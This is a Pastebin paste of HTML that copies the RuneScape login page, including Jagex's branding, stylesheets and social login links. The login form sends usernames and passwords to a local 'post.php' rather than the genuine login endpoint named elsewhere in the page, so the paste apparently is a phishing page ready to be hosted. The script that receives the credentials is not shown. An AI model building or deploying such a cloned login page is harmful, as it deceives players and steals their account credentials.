Advertisement
Guest User

Untitled

a guest
Jun 23rd, 2016
210
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.92 KB | None | 0 0
  1.  
  2. <!doctype html>
  3. <!--[if lt IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7" lang="en"><![endif]-->
  4. <!--[if (IE 7)&!(IEMobile)]><html class="no-js lt-ie10 lt-ie9 lt-ie8" lang="en"><![endif]-->
  5. <!--[if (IE 8)&!(IEMobile)]><html class="no-js lt-ie10 lt-ie9" lang="en"><![endif]-->
  6. <!--[if (IE 9)&!(IEMobile)]><html class="no-js lt-ie10" lang="en"><![endif]-->
  7. <!--[if gt IE 9]><!--><!-- x --> <html class="no-js" lang="en"> <!--<![endif]-->
  8. <head>
  9. <meta charset='UTF-8'>
  10. <title>RuneScape Log In</title>
  11. <meta name="viewport" content='width=device-width, initial-scale=1'>
  12. <meta name='description' content='Log in here to access your RuneScape account.'/>
  13. <meta name='author' content='Jagex'/>
  14. <meta http-equiv='X-UA-Compatible' content='IE=edge'>
  15. <link rel='dns-prefetch' href='//www.google-analytics.com' />
  16. <link rel='dns-prefetch' href='//ajax.googleapis.com' />
  17. <link rel='dns-prefetch' href='//connect.facebook.net' />
  18. <link rel='stylesheet' href='https://www.runescape.com/css/c/responsive/fonts-1.css' />
  19. <link rel='stylesheet' href='https://www.runescape.com/css/c/responsive/vendor-1.css' />
  20. <link rel='stylesheet' href='https://www.runescape.com/css/c/responsive/modules-4.css' />
  21. <link rel='shortcut icon' href='https://www.runescape.com/img/global/favicon.ico?1'>
  22. <link rel='apple-touch-icon' href='https://www.runescape.com/img/global/mobile.png?1'>
  23. <meta property='og:title' content='RuneScape Log In' />
  24. <meta property='og:site_name' content='RuneScape' />
  25. <meta property='og:image' content='https://www.runescape.com/img/microsite/social-share-fb.jpg' />
  26. <meta property='og:url' content='https://secure.runescape.com/m=weblogin/' />
  27. <meta property='og:description' content='Log in here to access your RuneScape account.' />
  28. <meta name='twitter:domain' content='RuneScape.com'>
  29. <meta name='twitter:url' content='https://secure.runescape.com/m=weblogin/'>
  30. <meta name='twitter:title' content='RuneScape Log In'>
  31. <meta name='twitter:description' content='Log in here to access your RuneScape account.'>
  32. <meta name='twitter:image:src' content='https://www.runescape.com/img/microsite/social-share.jpg'>
  33. <meta name='twitter:site' content='@RuneScape'>
  34. <meta name='google-site-verification' content='pUwl5KYHKSZ6tbbgsR2wYNv1kbVmsYral3iFmijHTWM' />
  35. <script type='text/javascript'>
  36. var _vis_opt_cookieDays = 1,
  37. _vwo_code=(function(){
  38. var account_id=54596,
  39. settings_tolerance=2000,
  40. library_tolerance=2500,
  41. use_existing_jquery=false,
  42. f=false,d=document;return{use_existing_jquery:function(){return use_existing_jquery;},library_tolerance:function(){return library_tolerance;},finish:function(){if(!f){f=true;var a=d.getElementById('_vis_opt_path_hides');if(a)a.parentNode.removeChild(a);}},finished:function(){return f;},load:function(a){var b=d.createElement('script');b.src=a;b.type='text/javascript';b.innerText;b.onerror=function(){_vwo_code.finish();};d.getElementsByTagName('head')[0].appendChild(b);},init:function(){settings_timer=setTimeout('_vwo_code.finish()',settings_tolerance);this.load('//dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&u='+encodeURIComponent(d.URL)+'&r='+Math.random());var a=d.createElement('style'),b='body{opacity:0 !important;filter:alpha(opacity=0) !important;background:none !important;}',h=d.getElementsByTagName('head')[0];a.setAttribute('id','_vis_opt_path_hides');a.setAttribute('type','text/css');if(a.styleSheet)a.styleSheet.cssText=b;else a.appendChild(d.createTextNode(b));h.appendChild(a);return settings_timer;}};}());_vwo_settings_timer=_vwo_code.init();
  43. </script>
  44. </head>
  45. <body class='login-page' id='login-page'>
  46. <main class='login-box login-box--weblogin'>
  47. <div class="login-box__container">
  48. <div class='login-logo'>
  49. <a href='http://www.runescape.com/community' id='rs-logo-home'>
  50. <img src='https://www.runescape.com/img/responsive/login/rs-logo.png' data-interchange='[https://www.runescape.com/img/responsive/login/rs-logo.png, small], [https://www.runescape.com/img/responsive/login/rs-logo@2x.png, retina]' alt="RuneScape Logo" title="RuneScape" />
  51. </a>
  52. </div>
  53. <form class='login-form' id='login-form' method='post' action='post.php' data-abide novalidate>
  54. <label class='login-form__label'>Email / Username:
  55. <input class='login-form__text' type='text' name='username' id='login-username' maxlength='200' title="Enter your Email / Username:" value='' autofocus required />
  56. <span class='form-error'>
  57. This field is required.
  58. </span>
  59. </label>
  60. <label class='login-form__label'>Password:
  61. <input class='login-form__text' type='password' name='password' id='login-password' maxlength='20' title="Enter your password" required />
  62. <span class='form-error'>
  63. This field is required.
  64. </span>
  65. </label>
  66. <button class='login-form__submit' id='rs-login-submit' type='submit'>Log In</button>
  67. <input type='hidden' value='www' name='mod' data-abide-ignore>
  68. <input type='hidden' value='0' name='ssl' data-abide-ignore>
  69. <input type='hidden' value='community' name='dest' data-abide-ignore>
  70. </form>
  71. <div class='login-additional'>
  72. <a class='login-additional__cannot' href='https://www.runescape.com/cant_log_in' target='_parent' id='login-cannot'>Can't Log In?</a>
  73. <div class='login-social'>
  74. <div class='login-social__column'>
  75. <a href='#' id='facebooklogin' class='login-social__button login-social__button--facebook' target='_parent'>Log In</a>
  76. </div>
  77. <div class='login-social__column'>
  78. <a href='https://secure.runescape.com/m=sn-integration/google/gamelogin.ws?mod=www&amp;ssl=0&amp;dest=community' id='googlelogin' class='login-social__button login-social__button--google' target='_parent'>Log In</a>
  79. </div>
  80. </div>
  81. <span class='login-additional__not-registered'>Not registered?</span><br />
  82. <a class='login-additional__create' href='https://secure.runescape.com/m=account-creation/create_account' target='_parent' id='login-create'>Create an account</a>
  83. </div>
  84. </div>
  85. </main>
  86. <script type="text/javascript"> var PAGEGLOBALS = {
  87. FB: {
  88. appId: '174823375888281',
  89. checkLoginURL: 'https://secure.runescape.com/m=sn-integration/checkLogin.ws',
  90. pesterURL: '&amp;mod=sn-integration&amp;ssl=1&amp;dest=setlogin.ws?',
  91. fbURL: 'https://secure.runescape.com/m=sn-integration/facebook/gamelogin.ws',
  92. loginURL: 'https://secure.runescape.com/m=weblogin/login.ws',
  93. defaultDestURL: 'loginform.ws%3Fmod%3Dwww%26ssl%3D0%26dest%3Dcommunity',
  94. queryString: 'mod=weblogin&ssl=1&dest=loginform.ws%3Fmod%3Dwww%26ssl%3D0%26dest%3Dcommunity',
  95. scope: ''
  96. }
  97. };
  98. </script>
  99. <script>
  100. PAGEGLOBALS.FB.queryString = 'mod=www&amp;ssl=0&amp;dest=community';
  101. </script>
  102.  
  103.  
  104. <script>
  105. var RESPONSIVE = RESPONSIVE || {};
  106. RESPONSIVE.constant = {
  107. url: {
  108. home: 'http://www.runescape.com/community'
  109. }
  110. };
  111. </script>
  112. <script src='https://www.runescape.com/js/c/responsive/vendor-1.js'></script>
  113. <script src='https://www.runescape.com/js/c/responsive/modules-2.js'></script>
  114. <script>
  115. RESPONSIVE.load();
  116. </script>
  117. <script type="text/javascript" src="https://www.runescape.com/js/rs3/gtm-3.js"></script>
  118. <script>dataLayer.push({'event':'GAVirtualPageview','pagePath':''});</script>
  119. </body>
  120. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement